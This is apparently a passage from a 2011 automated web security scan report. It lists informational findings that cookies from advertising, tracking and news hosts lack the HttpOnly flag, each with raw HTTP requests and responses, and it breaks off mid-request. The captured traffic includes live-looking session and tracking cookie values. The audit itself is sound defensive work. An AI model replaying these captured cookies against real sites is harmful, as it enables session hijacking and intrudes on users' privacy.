Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /i?bv=1.0.0&bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&t=J-D&al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&s=0&r=0.17090801848098636&SIG=10v2lvu5s;x-cookie=8xuw7w56dzwfu&o=4&f=qx HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=110

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=120;path=/; expires=Tue, 01-May-2013 20:00:00 GMT;domain=.yieldmanager.net
Set-Cookie: S=s=4c2m2vh6rrrg2&t=1304292866;path=/; expires=
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

17.82. http://d1.openx.org/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580& HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 01-May-2012 02:07:47 GMT; path=/
Content-Length: 2280
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

17.83. http://d1.openx.org/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lg.php?bannerid=522976&campaignid=246606&zoneid=0&OXLIA=1&loc=1&cb=64cd0da313&r_id=85dbdb9e09296233a4d7b328928878f8&r_ts=lkjpfk HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:08:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 01-May-2012 02:08:35 GMT; path=/
Set-Cookie: _OXLIA[522976]=lkjpfk-0+85dbdb9e09296233a4d7b328928878f8; expires=Wed, 01-Jun-2011 02:08:35 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

17.84. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTcwJnRsPTQzMjAw&piggybackCookie=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&r=http://a.triggit.com/pxpucm HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 01:56:32 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:33 GMT; path=/
Location: http://a.triggit.com/pxpucm
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.triggit.com/pxpucm">here</a>.</p>
<hr>
...[SNIP]...

17.85. http://insurancenewsnet.com/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...

17.86. http://loadm.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=001&bi=CAESENh7sluIi3Lo5TRo_oosBvM&cver=1&j=0 HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJxdi7EKgzAURf%252Fl7YEkLy%252FROFl1EFqH2kI38cVIhUIGsUvpv9d27HK4HO4ZPfrXugOubQ3FvrQH5cgwW5JWYyCOBucwSiYXMFdyyr8%252FpTxsyzT0Wpq2q36p9RAwarImCpcxCzNHEiyVFXnkmMVMGivxPy%252Fr21dp56Eqm77p7m59bO2Cx0SXcxpSWg%252FPExTvD46AL4M%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJylk8FugzAMht%252BFJ0icZCnhAmOHIhUqDYTYaepx5x67vXtTglInjek2rv78%252F8T498kAmMvZcGWyHphsuvqb8TLPc5UVX7asWWGpMFl77Ib94eNzbPpmyIqTEeoXQoYpBuBBrNGeREYDZ7K9dcMCuAVqqaNS0CsSoCNMOqo3MFkGrt6mZeAXR3eABnYUA%252FAg1mhPIqP3diq5%252FboGBMRcT3TmjO84i0D1OjwCMddxp1%252FiGC4xmMnRxEwWxBq%252FxBH3a2QE6QffOQYSfehBpVHGVl1ryrVOqPCagfoljtJrVol3zhpBv9PxxDtnz1D1s3pJyaOR1IXItQv57znQqScD%252Fvc8P4kvndKngdyUuw3x2pCilbBcAf0YadM%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyVk00OgyAQRu%252FiCWYG5GfceIxuXbho0l27M969UK2oAwYXBiTvke8THJgUT29G4oZA99Bi772nphuYeHoyduFpLYQB%252FtNZ8G3k1Ymnbnnde3bT6oywBvpIOlpJknuPj%252FE1fMamYJhMC4xxDGRb68RjhhcdtEyGa7JVqzPCeG69kaqQiTDfAa950QHlOew7BK3W%252BN0RdD0A5ZK51DlMI68Tj94rS6VzxAvTAzqRsWweM57vca1naj27aXVGWEN3J1O8ZpD9h%252BX3PvL3uifvVvdFqzPmL8HjKUg%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:58:25 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:58:25 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFjjEOgDAMA%252F%252FCC%252BxAIU0fE3XszIj6dwqVkKADW6Szc84221EsxhhS7jfSblSbGDb45oLFEejinFIxPlTlolQHxNGpfOjVBTutTQMq0UR8i8ZX9d60tqj8RcdNL2s9AYowOVA%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 02 May 2011 01:58:26 GMT
Server: HTTP server


17.87. http://loadus.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAxNzQ3izeONDEziDUwN443iDZWsa2sBRqkNBg%253D%253D; BFF=eJxLtDK3qi62MjS1Ugo2MjDx9HOuMTB0sLS0NFWyzgQKmxtYA2WNrZR8%252Ff1CPHwi48M8gz1DlKwTrQwNiNBogCyLLGEEl0DXYw6XQTMoxNDAxBek2ggqYQiUMIWKIwmhqDXGIuGHwxA%252FXGoRhtTidTpWV5rgcpIJPifhsh8AGMBniA%253D%253D; TFF=eJyNkD0OwyAMRu%252BSE9gGioCFY2RlYKjUrdki7l6jhghhWjHw%252F57hI3kkf75rvxHoCAajc462kDwfPD0GbsYCD9CmRfCm8mrgKXyXvWdvbc3gPdDrtfOeX%252BnIY219GXqSAutzHjBN3fE44UWGdg8Nnr21NYNHkbqR6sebCOcZ8D8vMqD83T4Da2tG%252BQCHK5kT

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server
Content-Length: 760

document.write('<img src="http://ad.yieldmanager.com/pixel?id=199372&data=218002&id=901810&data=218002&t=2" width="1" height="1"></img><iframe width="0" height="0" frameborder="0" src="http://loadus.e
...[SNIP]...

17.88. http://map.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=3669 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: map.media6degrees.com
Cookie: clid=2lgj1xn01171tpz736nle06u0000000117010701201; ipinfo=2lgj1xn0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lgj1xn01171tpz736nle06u40p9l0023d010j01501; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: ipinfo=2lkjr780zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sglst=2020sag3lkjr78000000013d010j015010tglkjr78000000013d010j01501; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: vstcnt=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 02 May 2011 02:35:31 GMT

GIF89a.............!.......,...........D..;

17.89. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692?AQB=1&ndh=1&t=1%2F4%2F2011%2023%3A33%3A45%200%20300&ce=UTF-8&ns=wpni&pageName=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&g=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&cc=USD&ch=wp%20-%20jobs&server=washingtonpost.com%20jobs&v0=AG0002174&events=event1&v1=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&h1=jobs%7Cfront&v2=wp%20-%20jobs&h2=washingtonpost.com%7Cjobs%7Cfront&c8=Monday&c9=12%3A30AM&c10=Weekday&v14=New&v15=First%20Visit&v16=1&c17=First%20Visit&c18=New&c23=jobs%7Cfront&c32=application%20-%20jobs%20cluster%20-%20jobs&c33=anonymous&c34=Commercial&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=983&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650; rss_now=false; wp_pageview=1; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DAG0002174%3B%20s_dslv%3DFirst%2520Visit%3B; s_pers=%20s_nr%3D1304310825793-New%7C1306902825793%3B%20s_lv%3D1304310825795%7C1398918825795%3B%20s_lv_s%3DFirst%2520Visit%7C1304312625795%3B%20s_vmonthnum%3D1306904400800%2526vn%253D1%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1304312625800%3B

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:34:44 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DEF70A05013F13-40000109A0000067[CE]; Expires=Fri, 29 Apr 2016 23:34:44 GMT; Domain=.washingtonpost.com; Path=/
Location: http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692?AQB=1&pccr=true&vidn=26DEF70A05013F13-40000109A0000067&&ndh=1&t=1%2F4%2F2011%2023%3A33%3A45%200%20300&ce=UTF-8&ns=wpni&pageName=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&g=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&cc=USD&ch=wp%20-%20jobs&server=washingtonpost.com%20jobs&v0=AG0002174&events=event1&v1=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&h1=jobs%7Cfront&v2=wp%20-%20jobs&h2=washingtonpost.com%7Cjobs%7Cfront&c8=Monday&c9=12%3A30AM&c10=Weekday&v14=New&v15=First%20Visit&v16=1&c17=First%20Visit&c18=New&c23=jobs%7Cfront&c32=application%20-%20jobs%20cluster%20-%20jobs&c33=anonymous&c34=Commercial&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=983&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 30 Apr 2011 23:34:44 GMT
Last-Modified: Mon, 02 May 2011 23:34:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www77
Content-Length: 0
Content-Type: text/plain


17.90. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.yahoo.com
Path:   /s/prweb/20110427/bs_prweb/prweb5276794

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /s/prweb/20110427/bs_prweb/prweb5276794 HTTP/1.1
Host: news.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
